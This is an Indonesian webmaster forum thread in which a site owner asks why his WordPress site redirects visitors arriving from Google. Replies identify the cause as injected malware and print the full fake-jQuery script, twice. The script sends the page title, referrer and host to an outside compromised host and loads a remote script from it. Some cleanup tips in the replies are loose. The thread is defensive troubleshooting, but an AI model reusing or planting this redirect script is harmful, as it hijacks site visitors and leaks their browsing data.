[ASK] Mengapa Saat Meng-Klik Website Kita Pada Pencarian Google Langusung Redirect?

Discussion in 'Search Engine Optimization' started by Permana27, Feb 22, 2016.

  1. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    Selamat pagi kawan bersosial.com

    Anee mau bertanya nih sama semua kawan dibersosial.com ini siapa tau aja ane nemuin solusinya untuk permasalahan yang ane hadapi ini.

    Jadi permasalahannya ketika ane cari kata kunci "Obat Rubella" pada google muncul deh website ane dihalaman ke 2 google paling bawah dengan nama website www [dot] bestagaric [dot] net

    Namun ketika anee klik website ane tersebut malah langsung redirect, anee yang bingung nih-,-

    Pada saat diklik otomatis alamat urlnya
    Code:
    http://www.bestagaric.net/obat-alami-rubella-paling-mujarab-dan-ampuh/
    
    dan ga berselang lama langsung deh ganti alamat urlnya menjadi
    Code:
    redirect.xmlheads.com/index.php
    
    setelah itu langsung dialihkan ke halaman awal google.

    Anee bener-bener bingung nih dengan permasalahan ini, karena ane cari tahu juga lewat google soal permasalahan ini malah berbelit-belit dan ga nemuin titik terang. Siapa tau aja disini ada yang bisa bantu anee dalam menghadapi permasalah seperti ini. Terima kasih sebelumnya
     
  2. Minecraftndns

    Minecraftndns Active Member

    Joined:
    Dec 13, 2015
    Messages:
    923
    Likes Received:
    101
    Trophy Points:
    43
    hmssss kayaknya masih ada misteri yg belum di pecahkan, tunggu aja mastah2 yg jawab mas.
    saya blom pernah ngalamin
     
  3. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    Oh belom pernah ya? Apa cuma ane doang nih yang ngalamin seperti ginian?
     
  4. Minecraftndns

    Minecraftndns Active Member

    Joined:
    Dec 13, 2015
    Messages:
    923
    Likes Received:
    101
    Trophy Points:
    43
    yah 2:10 mungkin mas, kan blogger bejibun sekrang
     
  5. Wawan Tamaram

    Wawan Tamaram Member

    Joined:
    May 28, 2015
    Messages:
    47
    Likes Received:
    11
    Trophy Points:
    8
    Ane sedang bukan ni den... udah 10menit lebih ngak berubah URLnya *bingung*
     
  6. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    iya juga sih yaa, tapi semoga ajadeh ada yang bisa bantu anee
     
  7. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    maksudnya gmn yaa? anee kurang paham nihh
     
  8. Minecraftndns

    Minecraftndns Active Member

    Joined:
    Dec 13, 2015
    Messages:
    923
    Likes Received:
    101
    Trophy Points:
    43
    hahaha yg comen lagi mabok kali tuh :D
     
  9. Rafa Asoka

    Rafa Asoka Member

    Joined:
    Sep 5, 2015
    Messages:
    633
    Likes Received:
    58
    Trophy Points:
    28
    barusan saya coba, dan ternyata bener redirect. saya gak bisa solusi, karena belum pernah ngalamin :( mungkin suhu - suhu bakal bisa jawab :D
     
  10. KangAndre

    KangAndre Member

    Joined:
    Jan 25, 2014
    Messages:
    10,148
    Likes Received:
    2,701
    Trophy Points:
    413
    Di tempat saya nggak bisa dibuka karena terblokir oleh Avast dikarenakan ada script berbahaya. !!!

    avast.jpg
     
  11. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    Waduh*kaget2* terus kira-kira seperti apa ya solusinya? bisa bantu pak?:(
     
  12. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    Iya gpp den, semoga aja ada yang bisa bantu yaa
     
  13. KangAndre

    KangAndre Member

    Joined:
    Jan 25, 2014
    Messages:
    10,148
    Likes Received:
    2,701
    Trophy Points:
    413
    Ini yang menyebabkan:
    Known javascript malware. MW:JS:GEN2?web.js.malware.fake_jquery.001
    Code:
    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://mebelcentrum1.home.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
    
    Coba cari via CPanel
     
  14. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    Iya siap pak laksanakan, makasih sebelumnya
     
  15. Griya Solo Web

    Griya Solo Web Member

    Joined:
    Feb 21, 2016
    Messages:
    118
    Likes Received:
    7
    Trophy Points:
    18
    coba perhatikan dan cek htaccesnya siapa tahu ketemu solusinya
     
  16. yogigesit

    yogigesit New Member

    Joined:
    Feb 24, 2016
    Messages:
    1
    Likes Received:
    1
    Trophy Points:
    3
    solusi : redirct ke www .xmlheads.com

    domainku juga redirect ke www. xmlheads.com artinya kalo gak salah gini bro: kalo domain redirct ke www. xmlheads.com berarti google anggep domain kita cuman spam. " Zero value " Percuma kalo index digoogle bertambah tapi ketika dibuka sama visitor jadinya cuman halaman google. Masih mending ke halaman google coba kalo redirect ke web orang malah ada beberapa url yang pindah " ke chat onlen saru "

    ane sendiri punya pengalaman barusan ini

    Code:
    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://mebelcentrum1.home.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
    
    Penyabab :

    1.Ada plugin dan menginstall sendiri, Hati hati bro jangan sembarangan instal plugin, bahkan jika parah bisa sampai posting sendiri. tenang jangan panik. remove plugin, kalo bisa disable comment

    2.Aku Update Wp--- via extract file di c panel = bahayanya adalah ketika kita download beberapa file masuk ke dalam winrar / zip . file. Jadi : jangan kira winrar aman yah

    3. Ada error script pada theme : Cek lokasinya di header theme kalo agan pake WP mesti tau. letaknya di bawah
    Code:
    <?php wp_head(); ?>
    Saran dari Pemula :
    - Samakan atua edit dengan theme awalnya bro untuk Header Theme lalu update
    - cek Pub iklan apakah cocok dengan pub kamu bro " siapa tau kenea hack
    untuk blogspot ane gak paham, ane cuman tau dikit bro..

    semoga membantu..
     
    Muhammad Khoir likes this.
  17. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    Siap den siap untuk dicoba;) Thanks masukannya den
     
  18. Permana27

    Permana27 Member

    Joined:
    Jul 27, 2015
    Messages:
    350
    Likes Received:
    11
    Trophy Points:
    18
    Wiihhh lengkap bener nih, thanks den atas bantuannya. Btw scriptnya itu sama kayak yang dikasih kang andre kan? Ya mungkin penyebabnya disitu kali yaaa?
     
  19. graficurl

    graficurl Member

    Joined:
    Mar 9, 2017
    Messages:
    92
    Likes Received:
    2
    Trophy Points:
    8
    Cek Htaccessnya mas.., barang kali settingannya salah..,
     
Loading...

Share This Page